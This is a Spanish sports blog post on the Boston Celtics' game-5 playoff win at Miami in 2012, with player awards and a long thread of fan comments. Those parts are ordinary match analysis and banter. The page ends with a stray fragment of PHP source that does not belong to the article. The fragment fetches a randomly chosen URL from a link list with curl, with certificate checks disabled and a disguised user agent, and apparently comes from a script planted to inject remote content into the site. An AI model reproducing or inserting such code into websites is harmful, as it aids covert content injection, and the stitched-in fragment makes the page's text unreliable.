La Crónica: La cruda realidad

06 de June de 2012 por TheDeerHunter

Pierce, Garnett, Rondo, Allen… Algunos los recitarán de memoria durante décadas, como así ha sido y será con los Johnson, Ainge, Bird, McHale y Parish.

El actual “big four” de los Celtics jamás ha perdido un 5º choque tras un 2-2. 9-0 en tal situación. No es casualidad. Quizás muchos deberían haber tenido eso en cuenta a la hora de darlos por condenados. Tampoco estaría de más conocer cuántas veces en la historia ese equipo ha desperdiciado la ocasión de rematar la faena en el Boston Garden.  Todo es posible en esta vida y en este deporte. Más altas torres han caído. Los Heat están contra las cuerdas.

Los Celtics fueron de menos a más. La presencia de Chris Bosh, saliendo de reserva, daba un impulso emocional que amasaba 13 puntos de ventaja pero sin hacer verdadera sangre. Los verdes sí saben morder donde duele y no se pusieron excesivamente nerviosos controlando las transiciones rivales. 8 puntos tan solo cedieron. Si los Heat no pueden correr tienen tendencia natural al colapso. Como si alguien se lo tuviera que explicar a Doc. Los propios Celtics anotaron más por esta vía.

Así fue. Con un Garnett inconmensurable, la súbita aportación de Bass y Pietrus y las dosis de calidad de Rondo, Pierce y Allen con las que siempre hay que contar, los Celtics anotaron con soltura. Mientras, los locales se atascaban en 18 puntos en el segundo y tercer cuartos. Cuanto más crítica es la situación y más espesos están en ataque, más se concentra el juego en LeBron y Wade. Ellos dos consiguieron 57 puntos en 47 lanzamientos; sus 7 compañeros 33 puntos en 35. Ansiedad y frustración latente. La casta y la testosterona les mantuvo en la pomada.

Pero cuando Pierce “The Truth” sonríe es que estás muerto. Los fantasmas de LeBron reaparecen inexorablemente. 8 minutos sin anotar en el cuarto decisivo es demasiado cuando eres “El rey”. Por si falta dolor, La Verdad te golpea con un triple en tu cara a falta de un minuto. 4 puntos que ante los Celtics bien parecen 400.

Un último apunte que conviene mencionar. 38ª actuación en dobles dígitos de asistencias en postemporada para Rajon Rondo, empatando con un tal Cousy. Récord absoluto de la franquicia que, podemos apostar lo que queramos, va a triturar.

PREMIOS

MVP: Kevin Garnett lideró a los suyos en todo momento hacia la victoria. Sus 26 puntos y 11 rebotes no son nada comparado con lo que supone a nivel de motivación tener a un jugador como él en el equipo.

Sorpresa: Mickael Pietrus se convirtió enel factor X de Boston. 13 puntos y 2 triples en momentos clave del partido.

Decepción: Cuando todo el mundo comentaba que la vuelta de Chris Bosh sería un factor decisivo para el devenir de la serie, llegan los Celtics y lo ponen todo patas arriba. Mal día para el ex de Toronto que no pudo regresar con victoria.

Esfuerzo en vano: LeBron James se fue a los 30 puntos pero estuvo casi 8 minutos sin anotar en el último cuarto. Allí fue cuando explotó Dwyane Wade, que acabó el partido con 27 puntos.

Imágenes | AP Photos / Getty Images

Comenta

34 comentarios a esta entrada

  1. melo15 dice:
    #1

    Cada vez que Bron hace un 4 cuarto malo, se disparan todas las alarmas y la gente comienza a decir se atasca.
    Creo que James nos ha demostrada cantidad de veces que si sabe a notar en los ultimos momento.
    Por otra parte, se le complican mucho las cosas a Miami, parece que Bosh no ha resuelto nada y Miami esta contra las cuerdas, creo que Lebron va a reaccionar en el 6 y se van a llevar la seri al AAA con 3-3.

      Citar

  2. Chris dice:
    #2

    ¡Qué grande es este equipo! El big four merece las finales en lo que a buen seguro serán sus últimos PO.
    Están a un pasito de cerrar miles de bocas que los llevan dando por muertos desde el inicio de la postemporada.

      Citar

  3. simon dice:
    #3

    Melo yo he defendido mucho a Lebron pero es que ya se nos acaban las excusas a los “defensores de Bron” es que cada final de partido apretado desaparece en 9 de cada 10, ahi es donde reside la diferencia entre Durant y el, Durant acierta al final en 9 de cada 10. A mi me parece una bestia y uno de los jugadores con mas incidencia global en el juego de toda la historia, pero ya tiene un bloqueo mental con los finales de partido que creo que no va a superar jamás…. yo ya no soy optimista con el en este apartado.

      Citar

  4. GreenPride dice:
    #4

    Ahora con más calma voy a intentar hacer mi crónica (grande la crónica del blog como siempre)
    Impresionante, sin palabras, los Celtics toman Miami y se ponen a un paso de las finales. En los comentarios que dejé del 4º partido decía:
    “Sin duda, en partidos decididos en las últimas jugadas creo que Boston puede tener ventajas ya que Doc es un maestro y además tienen varias opciones para el lanzamiento final. En los Heat el plan siempre parece dársela a LeBron y que se la juegue (si no está a Wade), esto les hace más previsibles y además es de sobra conocido que LeBron no es el mejor del mundo en tiros sobre la bocina.”
    Creo que no he acertado tanto en un comentario sobre basket en mi vida. Mientras “el Rey” se pasaba los últimos 8 minutos del partido sin meter una canasta (quitando la del último minuto en la que le dejan entrar) su defendido “The Truth” Pierce le clavaba en su cara el triple que finiquitaba el partido a 50 segundos del final.
    Pero empecemos por el principio. De inicio, los Heat salieron a por el partido lanzados por un LeBron convencido para intentar sacar de rueda rápido a Boston. Además los Celtics no metían una en ataque con Rondo negado ante el aro y el resto con malísimos porcentajes. Así las cosas los Heat sacaban 8 puntos de ventaja con la buena noticia de la reaparición de un recuperado Bosh que además había anotado ya algunos puntos. Pero claro los partidos en PO son muy largos y la presión va pudiendo y encogiendo brazos. Todo empezó a fraguarse en el segundo cuarto, en el que unos Celtics que seguían negados en ataque se las apañaron para bajar el ritmo del partido, ralentizarlo como a ellos les interesaba y coger a los Heat. En esos momentos ya se vislumbraba que se jugaba a lo que quería Boston con juego en media cancha, sin contraataques, sudando cada punto.
    Del vestuario salieron los Heat más convencidos y a mediados de cuarto un parcial de 9-0 les daba 9 puntos de ventaja. Era el momento de ver si los Celtics resistían o Miami se marchaba. Y la respuesta fue clara. 18-3 para Boston que no sólo recuperaba sino que cogía la delantera. Colapso ofensivo de Miami y los Celtics aprovechando cada fallo para anotar en transición o jugando con paciencia en ataque para buscar los tiros abiertos (Dooling y Pietrus contribuyendo). Increíble la mala defensa de los Heat de las transiciones (que no contraataques) de los verdes, esos despistes contra un equipo tan experimentado se pagan caros.
    De ahí al final, partido igualadísimo con Garnett machacando en la pintura (una auténtica pesadilla para los Heat) y Pierce que llevaba una noche infernal empezaba a tocar la guitarra. Los Heat vivían del talento de LeBron&Wade. El tempo favorecía claramente a Boston y se acercaba el tremendo final.
    Según se acercaba nueva desaparición de LeBron y los Heat quedaban en manos de Wade que mete algunas entradas realmente increíbles para mantener a los de Miami en el partido. Y llegamos al momento clave con empate Pierce mete dos tiros libres (tras nuevo despiste en transición de Miami) y Haslem falla uno y el partido queda con un minuto por jugar y 1 de ventaje Boston y balón para los Celtics. Ahí “The Truth” saca la varita y demuestra una vez más que es uno de los mejores en el clutch clavándo un triple en su cara a LeBron para decidir el partido.

      Citar

  5. GreenPride dice:
    #5

    En los Heat, sale muy tocado a parte de LeBron, Spoelstra que demuestra una vez más que no hay jugadas en los momentos calientes que no sean balón a Wade o LeBron y que jueguen 1 contra 5. Además, incomprensible que Bosh no saliera en los 2 últimos cuartos. En los 14 minutos que jugó hizo 9 puntos y 7 rebotes con lo que si tenía que jugar poco ¿No era mejor dejarlo para el final? Si no recayó de su lesión ha sido una decisión incomprensible. Ahora los Celtics se encuentran con la gran oportunidad de volver a las finales. Un 6º en casa con su afición y la moral por las nubes. Rondo maneja, Garnett machaca por dentro, Allen y Pierce anotan y contribución importantísima del banquillo con un Pietrus que ha aparecido justo a tiempo anotando, reboteando y sobre todo descargando a Pierce de la defensa de LeBron para que esté más fresco en ataque.
    Parece mentira pero están a punto de lograr la machada, presión tremenda para LeBron&Wade que quedan al borde del descalabro. Grandes Celtics!!!

      Citar

  6. Jose Luis dice:
    #6

    Un último apunte que conviene mencionar. 38ª actuación en dobles dígitos de asistencias en postemporada para Rajon Rondo, empatando con un tal Cousy. Récord absoluto de la franquicia que, podemos apostar lo que queramos, va a triturar.

    Al final del video, el comentarista dice que es la 39ª y dice pasa a Cousy, no sé quién lleva razón.

      Citar

  7. GreenPride dice:
    #7

    Por cierto, llevan días rumoreando que posiblemente Garnett se retire tras estos Playoffs. ¿Estamos locos? KG es para mí el MVP de estos PO hasta el momento. Un jugador líder, que obliga a su equipo a jugar hasta el último aliento, que defiende maravillosamente, martillea en el poste, lanza de media distancia, intenso hasta el extremo y sobre todo tiene un carácter que hace grande a un equipo. Espero que los Celtics hagan un esfuerzo por convencerle y poder seguir disfrutándole alguna temprada más.

      Citar

  8. TheDeerHunter dice:
    #8

    Pues el otro rumor es que se venía a Lakers, Green…

    Eso sería como la revancha por la afrenta de Shaq ¿no?… aunque yo emocionalmente no lo quiero ni en pintura (pragmáticamente es obvio que sí)

      Citar

  9. TheDeerHunter dice:
    #9

    Sobre los 38 o 39… honestamente no tengo ni idea quién tiene la razón. Probablemente él.

      Citar

  10. Pcerezo dice:
    #10

    Doc Rivers…no digo ná y lo digo tó…

    Es el MVP de los Play Offs. Joder, mirar con el equipo que está ganando. Pietrus, Bass? Si hasta si me apuras tienen mejor equipo los Knicks…
    Este tío es la mejor aparición en los banquillos desde Phil Jackson.
    Y la verdad ver jugar a Kevin Garnett, un tío que tiene más heridas en el cuerpo que el menda de Homeland, con la ilusión de un principiante supone la reconciliación con el deporte de élite. Si se retira se va un grande de verdad, irremplazable.

      Citar

  11. Pcerezo dice:
    #11

    Y ojo, ahora ya solo interesa una final OKC-Boston para ver que se inventa este puto genio para frenar a los Thunder…

      Citar

  12. nba dice:
    #12

    TheDeerHunter:
    Pues el otro rumor es que se venía a Lakers, Green…

    Eso sería como la revancha por la afrenta de Shaq ¿no?… aunque yo emocionalmente no lo quiero ni en pintura (pragmáticamente es obvio que sí)

    Pues yo lo siento, pero ni Kobe ni los Lakers se han ganado el privilegio de que Garnett acabe en los Angeles.
    Quien lo iba a decir a estas alturas .

      Citar

  13. Nacho dice:
    #13

    Mira que Rondo estuvo mal ayer en el tiro, pero a mí me tiene ganado. Es brutal cómo lleva el ritmo del partido. Brutal. Y eso que tuvo un par de despistes tontos.

      Citar

  14. TheDeerHunter dice:
    #14

    nba: Pues yo lo siento, pero ni Kobe ni los Lakers se han ganado el privilegio de que Garnett acabe en los Angeles.
    Quien lo iba a decir a estas alturas .

    ¿Que Kobe no se ha ganado qué?
    No entiendo nada.

      Citar

  15. jose antonio ramirez dice:
    #15

    GreenPride:
    Ahora con más calma voy a intentar hacer mi crónica (grande la crónica del blog como siempre)
    Impresionante, sin palabras, los Celtics toman Miami y se ponen a un paso de las finales. En los comentarios que dejé del 4º partido decía:
    “Sin duda, en partidos decididos en las últimas jugadas creo que Boston puede tener ventajas ya que Doc es un maestro y además tienen varias opciones para el lanzamiento final. En los Heat el plan siempre parece dársela a LeBron y que se la juegue (si no está a Wade), esto les hace más previsibles y además es de sobra conocido que LeBron no es el mejor del mundo en tiros sobre la bocina.”
    Creo que no he acertado tanto en un comentario sobre basket en mi vida. Mientras “el Rey” se pasaba los últimos 8 minutos del partido sin meter una canasta (quitando la del último minuto en la que le dejan entrar) su defendido “The Truth” Pierce le clavaba en su cara el triple que finiquitaba el partido a 50 segundos del final.
    Pero empecemos por el principio. De inicio, los Heat salieron a por el partido lanzados por un LeBron convencido para intentar sacar de rueda rápido a Boston. Además los Celtics no metían una en ataque con Rondo negado ante el aro y el resto con malísimos porcentajes. Así las cosas los Heat sacaban 8 puntos de ventaja con la buena noticia de la reaparición de un recuperado Bosh que además había anotado ya algunos puntos. Pero claro los partidos en PO son muy largos y la presión va pudiendo y encogiendo brazos. Todo empezó a fraguarse en el segundo cuarto, en el que unos Celtics que seguían negados en ataque se las apañaron para bajar el ritmo del partido, ralentizarlo como a ellos les interesaba y coger a los Heat. En esos momentos ya se vislumbraba que se jugaba a lo que quería Boston con juego en media cancha, sin contraataques, sudando cada punto.
    Del vestuario salieron los Heat más convencidos y a mediados de cuarto un parcial de 9-0 les daba 9 puntos de ventaja. Era el momento de ver si los Celtics resistían o Miami se marchaba. Y la respuesta fue clara. 18-3 para Boston que no sólo recuperaba sino que cogía la delantera. Colapso ofensivo de Miami y los Celtics aprovechando cada fallo para anotar en transición o jugando con paciencia en ataque para buscar los tiros abiertos (Dooling y Pietrus contribuyendo). Increíble la mala defensa de los Heat de las transiciones (que no contraataques) de los verdes, esos despistes contra un equipo tan experimentado se pagan caros.
    De ahí al final, partido igualadísimo con Garnett machacando en la pintura (una auténtica pesadilla para los Heat) y Pierce que llevaba una noche infernal empezaba a tocar la guitarra. Los Heat vivían del talento de LeBron&Wade. El tempo favorecía claramente a Boston y se acercaba el tremendo final.
    Según se acercaba nueva desaparición de LeBron y los Heat quedaban en manos de Wade que mete algunas entradas realmente increíbles para mantener a los de Miami en el partido. Y llegamos al momento clave con empate Pierce mete dos tiros libres (tras nuevo despiste en transición de Miami) y Haslem falla uno y el partido queda con un minuto por jugar y 1 de ventaje Boston y balón para los Celtics. Ahí “The Truth” saca la varita y demuestra una vez más que es uno de los mejores en el clutch clavándo un triple en su cara a LeBron para decidir el partido.

    Que grandes x dios¡¡ Yo esperaba esto ayer, estaba convencido de que pasaba la eliminatoria y era hora de dar el puñetazo en la mesa ganando fuera.Te cite anoche en la cronica de los otros dias y te puse- ” Que te dije hombre de poca fe, los orgullosos son mucho. Sabia que se pondrian 2-2 y lo mas importante, la serie SE VA A GANAR. Por los huevos de garnett, rondo, pierce, allen, auberbach, rivers y el garden. Porque son muy superiores y porque vamos a vivir unas finales de nuevo”. E confiado desde el 2-0 porque se veia quien era un equipo y quien sigue con los mismos defectos del año pasado. Que se prepare miami que en el sexto el garden va a arder como en las mejores noches y creo que el repaso que se pueden llevar va a ser de los que cambian equipos y estrellas, porque miami va a llegar muy tocado. Y boston no es indiana. Que fe tengo en este equipo¡¡ y que poco hacen para quitarmela. Es la hora de rematar. Que disfrute y emocion viendo ganar anoche el partido. Vamos a tener la oportuniad de luchar por otro anillo una vez mas. BIG¡¡

      Citar

  16. jose antonio ramirez dice:
    #16

    Lebron y wade y los heat son una panda de niñatos engreidos que se escuenden en los minutos finales, a quien no le guste eso que se vaya a ver a los bobcats porque es la verdad pura y dura. Espero que lebron se ria en el sexto cuando se marche de vacaciones lo mismo que se rio en la cara de garnett

      Citar

  17. diestro dice:
    #17

    Ni antes eran tan malos ni ahora son tan buenos …

    Espero que pasen los verdes porque se lo merecen muchísimo, pero igual que se los dio por muertos antes de tiempo, que la gente no cometa el mismo error con Miami.

    Estamos en Playoffs , todo puede pasar. I love this game

      Citar

  18. GreenPride dice:
    #18

    jose antonio ramirez: Que grandes x dios¡¡ Yo esperaba esto ayer, estaba convencido de que pasaba la eliminatoria y era hora de dar el puñetazo en la mesa ganando fuera.Te cite anoche en la cronica de los otros dias y te puse- ” Que te dije hombre de poca fe, los orgullosos son mucho. Sabia que se pondrian 2-2 y lo mas importante, la serie SE VA A GANAR. Por los huevos de garnett, rondo, pierce, allen, auberbach, rivers y el garden. Porque son muy superiores y porque vamos a vivir unas finales de nuevo”. E confiado desde el 2-0 porque se veia quien era un equipo y quien sigue con los mismos defectos del año pasado. Que se prepare miami que en el sexto el garden va a arder como en las mejores noches y creo que el repaso que se pueden llevar va a ser de los que cambian equipos y estrellas, porque miami va a llegar muy tocado. Y boston no es indiana. Que fe tengo en este equipo¡¡ y que poco hacen para quitarmela. Es la hora de rematar. Que disfrute y emocion viendo ganar anoche el partido. Vamos a tener la oportuniad de luchar por otro anillo una vez mas. BIG¡¡

    jose antonio, tengo que reconocer que tú creíste en este equipo para esta eliminatoria cuando yo no creí. Los veía demasiado muertos y mal físicamente como para poder hacer lo que están haciendo. Cómo me alegro de poder decir que tú llevabas toda la razón y yo me equivocaba totalmente, que me han cerrado la boca. Ahora bien, no está todo hecho. Falta ganar un partido para dar la gran sorpresa, no de estos PO sino de los últimos años pero no seré yo el que diga más que no confío en estos Celtics. Sea como sea que nos quiten lo bailao a los aficionados célticos porque este gran equipo nos hace disfrutar muchísimo.

      Citar

  19. Viva_Dirk dice:
    #19

    GreenPride:
    En los Heat, sale muy tocado a parte de LeBron, Spoelstra que demuestra una vez más que no hay jugadas en los momentos calientes que no sean balón a Wade o LeBron y que jueguen 1 contra 5. Además, incomprensible que Bosh no saliera en los 2 últimos cuartos. En los 14 minutos que jugó hizo 9 puntos y 7 rebotes con lo que si tenía que jugar poco ¿No era mejor dejarlo para el final? Si no recayó de su lesión ha sido una decisión incomprensible.

    Completamente deacuerdo con esto. Es algo que he dicho siempre y creo que en general tanto el aficionado como los propietarios lo infravaloran mucho. En los últimos 20 años los anillos los han ganado Phil Jackson, Popovich, Rudy Tomjanovich, Pat Riley, Larry Brown, Doc Rivers y un Carlisle que se habia llevado muuuuuchos palos en play-offs.

    No se puede poner al frente de un proyecto como los Heat a un don nadie y ahí parte de culpa la tiene Riley que si este año acaba en fracaso el que viene debe bajar al banco si la salud no se lo impide. La lección de Rivers es genial.

    En cuanto a Lebron, la defensa que le hace a Pierce en el triple a falta de 50 segundos es ridícula, no se si esperaba que Pierce no se atreviera a tirar, jojo.

      Citar

  20. Juan S dice:
    #20

    jose antonio ramirez:
    Lebron y wade y los heat son una panda de niñatos engreidos que se escuenden en los minutos finales, a quien no le guste eso que se vaya a ver a los bobcats porque es la verdad pura y dura. Espero que lebron se ria en el sexto cuando se marche de vacaciones lo mismo que se rio en la cara de garnett

    Wade para nada se escondió, dio la cara en el último cuarto por Lebron, Bosh y Spoelstra.
    Lo de Lebron sí que es desesperante, yo personalmente esperaba mucho más de él, pero no acaba de ser lo que se espera de él. Le queda un 6to para redimirse.

      Citar

  21. rumbero dice:
    #21

    La culpa de todo esto es del King, pero no por esconderse en el último cuarto, sino por reirse en la cara del señor Garnett en el Game1. No se le puede tocar la moral al capo. Ya me lo imagino: “De mi no te vas a reir figura. Yo solito os voy a destrozar en la pintura y me va a dar tiempo de cascarme unas flexiones. Le voy a decir a Allen que se deje el taca-taca en el vestuario y a Pierce que te clave un clutch de los suyos en tu cara. A Rondo le diré que se marque un partido de leyenda pero que os deje vivos, eso si en los otros games os va a marear lo que le de la gana. Además le pegaré un par de collejas a los reservas para que espavilen, rejuveneceremos todos y os apretaremos las clavijas en defensa. Ah, y tengo un amigo que se llama Doc que seguro os tiene algo preparado. ” Y 2-3. Coincido con GreenPride. Rondo es el que dirige, pero el líder de este equipo está siendo Kevin. Que PO se está marcando por dios. Yo estoy disfrutando como un enano con esta serie, y nada me gustaría más que ver a estos Celtics en la final. Queda cerrarlo, y lo que no se puede hacer ahora es enterrar a Miami como se hizo con los Celtics, pero lo que han hecho estos viejos lo vamos a recordar todos.

      Citar

  22. Esteban dice:
    #22

    mas alla de que boston salga campeon esta temporada o no, yo creo que aunque pasen esta ronda no podran con quien salga del oeste ni en figuritas… creo que son los grandes ganadores de este año

    una temporada que arranco muy mal, unos PO que arrancaron tamb muy mal, muchisimas lesiones, y etc ya los daban por muertos y hasta se buscaron trades para su big 4,
    bueno creo que a lo largo de 3 eliminatorias, su big 4 se muestra vigente, y si no logran este titulo, todos querran quedarse para jugar el año que viene,
    q

      Citar

  23. Esteban dice:
    #23

    ganaron me diran?

    concientizarse que rondo es uno de los mejores bases de la NBA, que garnett aun esta vigente y que puede llevar a un equipo a cosas importantes, y que bass es un hombre a tener en cuenta seriamente

    desp de estos PO allen y garnett, veran que aun es posible ser campeones en boston y seguramente renovaran por poco dinero, algo como 5 mill cada uno calculo, lo que les dejaran 30 millones en espacio salarial, para fichar un pivot (okafor si es anmistia, kaman, camby, martin o el que guste) y renovar la banca con calidad probada, el regreso de green, un o.j. mayo, el propio bass, entre otros

    creo que habra celtics en grandes historias para dos o tres años mas

      Citar

  24. jose antonio ramirez dice:
    #24

    rumbero:
    La culpa de todo esto es del King, pero no por esconderse en el último cuarto, sino por reirse en la cara del señor Garnett en el Game1. No se le puede tocar la moral al capo. Ya me lo imagino: “De mi no te vas a reir figura. Yo solito os voy a destrozar en la pintura y me va a dar tiempo de cascarme unas flexiones. Le voy a decir a Allen que se deje el taca-taca en el vestuario y a Pierce que te clave un clutch de los suyos en tu cara. A Rondo le diré que se marque un partido de leyenda pero que os deje vivos, eso si en los otros games os va a marear lo que le de la gana. Además le pegaré un par de collejas a los reservas para que espavilen, rejuveneceremos todos y os apretaremos las clavijas en defensa. Ah, y tengo un amigo que se llama Doc que seguro os tiene algo preparado. ” Y 2-3.Coincido con GreenPride. Rondo es el que dirige, pero el líder de este equipo está siendo Kevin. Que PO se está marcando por dios. Yo estoy disfrutando como un enano con esta serie, y nada me gustaría más que ver a estos Celtics en la final. Queda cerrarlo, y lo que no se puede hacer ahora es enterrar a Miami como se hizo con los Celtics, pero lo que han hecho estos viejos lo vamos a recordar todos.

    Tengo que decir que eres un fenomeno. jajajajaja Que bueno

      Citar

  25. Uno cualquiera dice:
    #25

    GreenPride:
    Ahora con más calma[…]decidir el partido.

    Pues yo creo que el MVP de lo que va de finales de conferencia está siendo GreenPride. Menudas crónicas se está marcando. ¡Jugón!

      Citar

  26. GreenPride dice:
    #26

    Muy bueno rumbero.
    Totalmente de acuerdo con Esteban, acaben como acaben los PO, Boston ya ha escrito una historia que será recordada. Si llegan a las Finales y ya no digo como las ganen sería quizás la victoria más sorprendente de la historia de la NBA. En cuanto a que no tienen nada que hacer en caso de llegar a las Finales, no seré yo el que vuelva a decir que los veo sin opciones para que luego me tapen la boca….

      Citar

  27. Vader dice:
    #27

    Mi más sincera felicitación a los Celtics. Ojala mis Knicks tengan algún día un equipo así, con mayúsculas. Que lástima que no tengan a Perkins…

    Saludos

      Citar

  28. Ru dice:
    #28

    Quien iba a decir que tras una temporada que empezaba tan mal con el lockout,temiendo incluso que pudiera ser cancelada llegasen los PO’s y viéramos estas dos pedazo de finales de conferencia,este año si que es “Where amazing happens”,remontadas,equipos viejos que se daban por muertos,auténticas exhibiciones individuales…

      Citar

  29. Esteban dice:
    #29

    GreenPride:
    Muy bueno rumbero.
    Totalmente de acuerdo con Esteban, acaben como acaben los PO, Boston ya ha escrito una historia que será recordada. Si llegan a las Finales y ya no digo como las ganen sería quizás la victoria más sorprendente de la historia de la NBA. En cuanto a que no tienen nada que hacer en caso de llegar a las Finales, no seré yo el que vuelva a decir que los veo sin opciones para que luego me tapen la boca….

    bueno si, estos celtics nos viven tapando la boca, pero en principio, y de apostar en el caso que los celtics juegen una final, tanto el thunder como los spurs deberian ganar una serie a boston, 6 o 7 juegos eso si,

    que mundo aparte de toda la temporada son los PO, pensar que durante la regular los celtics salian asi:

    rondo, allen, pierce, garnett-o´neal y sus jugadores del banco con mas minutos eran bradley, pavlovic, bass y wilcox

    ahora son: rondo-allen-pierce-bass-garnett y del banco juegan dooling, pietrus, daniels y stiemsma

    rivers sabe reinventarse no?

      Citar

  30. Lucho dice:
    #30

    “MVP: Kevin Garnett lideró a los suyos en todo momento hacia la victoria. Sus 26 puntos y 11 rebotes no son nada comparado con lo que supone a nivel de motivación tener a un jugador como él en el equipo”

    Suscribo totalmente

      Citar

  31. HisRoyalAirness dice:
    #31

    Para mí el MVP de PO es KG…pero junto con Rondo. El 9 de los verdes es un espectáculo.
    Y a mí que me den a Lebron durante 40 minutos, sin duda, pero los últimos 8 me los juego con Wade sin lugar a dudas.
    Me encantaría una final SA vs Celtics, seria sublime

      Citar

  32. simon dice:
    #32

    Madremia dando una vueltas por varios blogs y medios de nba en español viendo noticias aqui y allá me he parado en algunas a leer los comentarios de los lectores y de repente he sentido una enorme gratitud a todos los habituales de esta pagina… Es raro el Blog o pagina web en el que no aparecen ultras de un lado y de otro diciendo nada mas que tonterias y el tipico que no sabe ni como llegó a leer esa noticia faltando al respeto a los demás desde el primer momento, aqui de momento nos libramos de ese tipo de foreros/blogueros ( gracias a Dios y esperamos que sigan asi ) y siempre se crean interesantes y fructiferos debates a raiz de las noticias pero siempre desde el respeto y desde el conocimiento de este juego. Cada vez me alegro mas de haber dado con esta página. Gracias. Perdón por el momento emotivo pero entre examenes, Play Off y el calor de estos días estoy especialmente “sensible”. jejejeje

    PD: Para mi el MVP de estos PO es tambien para KG con 0.1 puntos por encima de Rondo. Increible el corazón de estos celtics.

      Citar

  33. nba dice:
    #33

    Pues no se pero parece que Durantula se quiere llevar el MVP de los playoffs,
    Kobe debe estar dandose cabezazos contra la pared, ya que puede que Fisher acabe con un anillo mas que el

      Citar

  34. simon dice:
    #34

    nba:
    Pues no se pero parece que Durantula se quiere llevar el MVP de los playoffs,
    Kobe debe estar dandose cabezazos contra la pared, ya que puede que Fisher acabe con un anillo mas que el

    si gana el anillo imagino que se retirara no?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>